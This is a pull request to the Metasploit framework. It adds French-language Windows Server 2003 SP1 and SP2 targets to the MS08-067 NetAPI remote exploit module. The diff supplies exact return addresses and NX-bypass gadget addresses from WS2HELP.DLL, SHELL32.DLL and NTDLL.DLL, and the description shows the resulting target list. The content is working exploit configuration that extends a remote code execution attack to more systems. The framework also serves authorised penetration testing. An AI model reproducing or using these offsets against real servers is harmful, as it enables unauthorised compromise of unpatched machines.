### PR TITLE
MS08-067 NetAPI Exploit - Added Windows 2003 SP1 & SP2 French targets

### DIFF
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -621,6 +621,27 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408,
            }
           ],
+          
+          # Standard return-to-ESI without NX bypass
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NO NX)',
+            {
+              'Ret'       => 0x71ac1c40 ,
+              'Scratch'   => 0x00020408,
+            }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP1
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP1 French (NX)',
+            {
+              'RetDec'    => 0x7CA2568C,  # dec ESI, ret @SHELL32.DLL
+              'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
+              'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
 
           # Standard return-to-ESI without NX bypass
           ['Windows 2003 SP2 English (NO NX)',
@@ -697,6 +718,27 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408
            }
           ], # JMP ESI WS2HELP.DLL
+          
+          # Standard return-to-ESI without NX bypass
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP2 French (NO NX)',
+            {
+              'Ret'       => 0x71AC2069,
+              'Scratch'   => 0x00020408,
+            }
+          ], # CALL ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          # Added by Omar MEZRAG - 0xFFFFFF
+          [ 'Windows 2003 SP2 French (NX)',
+            {
+              'RetDec'    => 0x7C98BEB8,  # dec ESI, ret @NTDLL.DLL
+              'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
+              'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
+              'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
 
           #
           # Missing Targets

--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -621,7 +621,6 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408,
            }
           ],
-          
           # Standard return-to-ESI without NX bypass
           # Added by Omar MEZRAG - 0xFFFFFF
           [ 'Windows 2003 SP1 French (NO NX)',
@@ -718,7 +717,6 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408
            }
           ], # JMP ESI WS2HELP.DLL
-          
           # Standard return-to-ESI without NX bypass
           # Added by Omar MEZRAG - 0xFFFFFF
           [ 'Windows 2003 SP2 French (NO NX)',


### PR DESCRIPTION
```
msf exploit(ms08_067_netap) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   [...]
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)

   [...]
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
```
